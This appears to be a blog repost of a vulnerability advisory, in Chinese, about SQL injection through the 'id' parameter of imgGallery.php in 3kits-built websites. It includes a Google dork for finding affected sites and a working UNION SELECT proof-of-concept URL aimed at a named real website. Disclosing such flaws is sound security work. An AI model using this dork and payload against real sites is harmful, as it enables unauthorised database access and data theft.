3kits模板imgGallery.php存在SQL注入漏洞:id参数可被恶意利用

文章披露了3kits模板系统中imgGallery.php文件存在的SQL注入漏洞,攻击者可利用该漏洞通过精心构造的id参数执行恶意SQL查询,获取数据库敏感信息。

Exploit Title: 3kits - SQL 注入漏洞

Google Dork: “Designed & Developed by 3kits”

日期: 2025-11-02

漏洞作者: Hossein_0xB

类别: Web应用

测试环境: Windows 10

CVE: 暂无

概念验证:

演示:

https://hyderabadrealtors.org/imgGallery.php?id=-3 union select 1,version(),3,4

发现者: Hossein_0xB

邮箱: dastkherd.makoraan@gmail.com

参考链接:

comments powered by Disqus
© 2020 - 2026 qife
使用 Hugo 构建
主题 StackJimmy 设计
本站总访问量 本站访客数人次